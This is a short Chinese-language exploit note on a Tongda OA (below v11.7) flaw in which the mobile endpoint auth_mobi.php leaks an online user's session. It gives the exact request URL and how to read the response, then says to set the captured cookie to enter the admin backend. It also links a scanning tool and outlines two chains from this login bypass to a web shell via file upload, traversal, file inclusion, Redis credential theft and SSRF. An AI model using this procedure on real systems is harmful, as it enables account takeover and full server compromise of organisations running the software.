漏洞简述
通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统
影响版本
通达OA < v11.7
漏洞利用
检测当前用户是否存在线
1 | http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 |
不在线
不在线显示 RELOGIN
在线
在线页面空白,但已拿到SESSION
设置Cookie可直接登录后台
1 | http://127.0.0.1/general/index.php |
工具利用
https://github.com/S1xHcL/TongDa_Scan
1 | # 指定 URL |
待更新
- 多线程,加快扫描速度
- 自动getshell
方法一
任意用户登录 -> 低权限文件上传 -> 目录穿越 -> 任意文件包含 -> getshell
方法二
任意用户登录 -> 获取安装目录 -> 任意文件读取(redis账号密码) -> ssrf写文件 -> getshell